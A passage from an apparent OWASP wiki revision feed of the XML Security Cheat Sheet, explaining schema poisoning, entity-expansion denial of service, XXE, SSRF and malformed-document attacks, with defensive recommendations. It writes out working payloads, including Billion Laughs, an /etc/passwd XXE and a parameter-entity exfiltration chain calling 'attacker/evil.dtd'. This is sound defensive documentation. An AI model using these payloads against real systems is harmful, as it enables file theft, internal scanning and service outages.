 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, example.com resolves to the IP address 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; refers to another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined in terms of entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 (10^10) characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt; that it contains; each of those will then be resolved as 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. In the end, the CPU and/or memory will be affected by expanding 10^9 (1,000,000,000) copies of the string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, roughly 3*10^9 (3,000,000,000) characters, which could make the parser crash.&lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:Envelope [&lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;SOAP-ENV:Envelope entityReference=&amp;quot;&amp;amp;LOL9;&amp;quot; xmlns:SOAP-ENV=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAP-ENV:Body&amp;gt;&lt;br /&gt;
    &amp;lt;keyword xmlns=&amp;quot;urn:parasoft:ws:store&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP-ENV:Body&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP-ENV:Envelope&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an external entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; that refers to the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt; and is expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes it retrieve remote resources, for example a file over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, and to perform port scanning or brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure, you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to an open port will be much shorter (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224417</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224417"/>
				<updated>2016-12-21T19:04:23Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software. &lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take significant additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
If it is not possible to process only well-formed documents, take into consideration that the final results could be unreliable. To avoid this attack completely, you must not recover or process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must define a maximum number of items (elements, attributes, entities, etc.) to be processed by the parser. An XML schema could also be used to validate the document structure before being parsed.&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must use an XML processor that follows W3C specifications. In addition, validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well formed is to open one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, the attacker could buy a book without actually paying for it. &lt;br /&gt;
&lt;br /&gt;
; Recommendation&lt;br /&gt;
Each XML document must have a precisely defined XML schema with every piece of information properly restricted to avoid problems of improper data validation. &lt;br /&gt;
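&lt;br /&gt;
As a minimal sketch of such a schema, assuming the two-element &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; document shown above and data types chosen only for illustration, the following definition accepts exactly one &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; followed by exactly one &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. A validating parser would therefore reject the document carrying the injected elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;!-- minOccurs and maxOccurs default to 1, so repeated elements are invalid --&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;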
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
